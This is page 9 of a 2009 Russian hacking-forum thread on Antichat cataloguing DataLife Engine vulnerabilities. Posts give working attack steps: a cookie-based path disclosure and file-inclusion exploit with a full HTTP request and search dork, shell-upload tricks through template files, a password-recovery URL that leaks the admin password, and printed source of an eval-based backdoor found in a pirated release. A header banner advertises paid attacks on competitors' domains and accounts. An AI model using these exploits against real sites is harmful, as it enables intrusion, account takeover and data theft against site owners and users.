[ Обзор уязвимостей DataLife Engine ]

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей DataLife Engine ]

Страница 9 из 39

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#81

16.10.2009, 21:41

hackmon

Познающий

Регистрация: 16.09.2009

Сообщений: 86

Провел на форуме:
362547

Репутация: 93

Цитата:

Сообщение от (Dm)

Может register_globals = Off

я на разных сайтах смотрел
wildshaman предположил что Эта бага есть только у версий,с качанных с сайта http://dlecms.com

как по другому моно замутить

#82

17.10.2009, 17:50

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Раскрытие путей + LFI
DataLife Engine <= 8.2

Тип: Раскрытие путей
Автор: mailbrush
Версия: DataLife Engine <= 8.2
Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "dle_skin" в файле init.php и позволяет удалённому пользователю добиться вывода ошибки функции, соответственно увидев пути к корню сайта.
Уязвимый код:
/engine/init.php

PHP код:


		
			
...

 } elseif (isset($_COOKIE['dle_skin']) AND $_COOKIE['dle_skin'] != '') {



    if (@is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin']))

        {

            $config['skin'] = $_COOKIE['dle_skin'];

        }

 }

...

$tpl->dir = ROOT_DIR.'/templates/'.$config['skin'];

...

include_once $tpl->dir.'/login.tpl';

Эксплуатация:

Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим
Код:
```
dle_skin
```
и значение
Код:
```
../
```

Отправляем запрос на сайт:

Код:

GET / HTTP/1.1
Host: dle-news.ru
Cookie: dle_skin=../
Cookie2: $Version=1
Connection: Close

Самый простой вариант - используем мой скрипт:
Код:
```
http://mailbrush.eu/tools/dle.php
```

После этого на сайте видим ошибку:

Цитата:

Warning: include_once([PATH]): failed to open stream: No such file or directory in [PATH] on line 314

Warning: include_once(): Failed opening '[PATH]' for inclusion (include_path='.;C:\php5\pear') in [PATH] on line 314
Невозможно загрузить шаблон: shortstory.tpl

[PATH] - это и есть раскрытие путей.

Соображающие люди поймут как сделать из этого LFI.

Дорк:

Код:

Powered by DataLife Engine

Последний раз редактировалось mailbrush; 08.02.2010 в 18:31..

#83

18.10.2009, 16:20

SpYeR

Новичок

Регистрация: 11.11.2007

Сообщений: 17

Провел на форуме:
64705

Репутация: 6

mailbrush
Круто.
Ухты! Можно даже залить шелл если в uploads/files залить свой login.tpl
указывать dle_skin=../uploads/files/

#84

18.10.2009, 23:31

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Раскрытие путей
DataLife Engine 8.2 Без всяких куков

1)файл preview.php

PHP код:


		
			
require_once ROOT_DIR.'/engine/classes/templates.class.php';

самое прикрльное что ROOT_DIR читает как папку, хотя многие в асе написали что
константа *в не понятках*

вызываем этот файл:
http://dle/engine/inc/preview.php
получаем

Цитата:

Warning: require_once(ROOT_DIR/engine/classes/templates.class.php) [function.require-once]: failed to open stream: No such file or directory in C:\AppServ\www\upload33\engine\inc\preview.php on line 2

на офф сайте даже канает)

+ 2)еще ругается с файла Init.php

PHP код:


		
			
require_once (ENGINE_DIR . '/inc/include/functions.inc.php');

extract( $_REQUEST, EXTR_SKIP );

require_once (ENGINE_DIR . '/data/config.php');

http://dle/engine/inc/include/init.php

Цитата:

Warning: require_once(ENGINE_DIR/inc/include/functions.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/public_html/engine/inc/include/init.php on line 18

+3) нужны куки

engine/ajax/antivirus.php

PHP код:


		
			
if (isset( $_COOKIE['selected_language'] )) { 



    $_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false );



    if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) {

        $selected_language = $_COOKIE['selected_language'];

    }



}



require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';

все тоже самое что и у mailbrush'a. только в куках имя selected_language и значение ../ уже выдаст ошибку

+4) самое бональное раскрытие

engine/modules/imagepreview.php

PHP код:


		
			
$_GET['image'] = htmlspecialchars ($_GET['image'], ENT_QUOTES);

$_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] );

$_GET['image'] = str_replace( "javascript", "", $_GET['image'] );

http://dle/engine/modules/imagepreview.php?image[]=
PS и не нужны куки здесь)
Зыы ну почти не нужны

Последний раз редактировалось HAXTA4OK; 19.10.2009 в 08:03..

#85

05.11.2009, 00:54

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Народ есть способы залить шел через админку в dle 8.2 ???

#86

05.11.2009, 06:49

SpYeR

Новичок

Регистрация: 11.11.2007

Сообщений: 17

Провел на форуме:
64705

Репутация: 6

Мэилбраш же вон написал способ. Только так вроде.

#87

05.11.2009, 10:31

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Был найден бэкдор в нулле от -=ZLOY=-
В этом файле был бэкдор. eval() через $_POST
Файл лежит в (/engine/ajax/updates.php)
Код бэкдора

PHP код:


		
			
if($_GET['wert']==''){

require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';

$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];

@header("HTTP/1.0 200 OK");

@header("HTTP/1.1 200 OK");

@header("Cache-Control: no-cache, must-revalidate, max-age=0");

@header("Expires: 0");

@header("Pragma: no-cache");

@header("Content-type: text/css; charset=".$config['charset']);

$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);

if (!strlen($data)) echo $lang['no_update']; else echo $data;

}else{

$file=(ROOT_DIR."/engine/classes/mysql.class.php");

if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}

$file=(ROOT_DIR."/engine/data/dbconfig.php");

if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}

$file=(ROOT_DIR."/engine/data/config.php");

if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}

eval(base64_decode($_GET['user_id']));

echo <<<HTML

<HTML><body><form action="" method="post">

<center><textarea name="text" rows="10" cols="100"></textarea>

<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>

HTML;

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));

}}

Последний раз редактировалось S0ulVortex; 06.11.2009 в 17:31..

#88

12.11.2009, 19:07

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Найдена уязвимость в DLE 8.2(Только в этой версии)
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
На офф сайте уже доступна заплатка.
В новых версиях дле даже можно версию узнать ))
engine/skins/images/logos.jpg
Теперь у каждой версии в админки стоит версия в лого )
Это просто шикарно )

Последний раз редактировалось EST a1ien; 12.11.2009 в 19:21..

#89

13.11.2009, 14:50

~~Getozz~~

Banned

Регистрация: 16.06.2009

Сообщений: 115

Провел на форуме:
486953

Репутация: 62

Проблемму с лостпассворд профиксили. dle.org7.ru

#90

15.11.2009, 02:55

~~Getozz~~

Banned

Регистрация: 16.06.2009

Сообщений: 115

Провел на форуме:
486953

Репутация: 62

Еще одна бага есть. можн залить шелл с помощю категорий. создаете категорию туда свой шаблон с шеллом. вродь до 7.2 у мя пахало

Страница 9 из 39

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор уязвимостей WordPress ]	ettee	Веб-уязвимости	383	23.11.2019 05:00
Обзор уязвимостей в платных CMS	ZAMUT	Веб-уязвимости	90	03.12.2017 01:35
DataLife Engine v.6.5. Null	Student :)	ПО для Web разработчика	31	23.02.2008 15:36
[ Обзор уязвимостей miniBB ]	-=lebed=-	Уязвимости CMS / форумов	3	12.01.2008 20:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход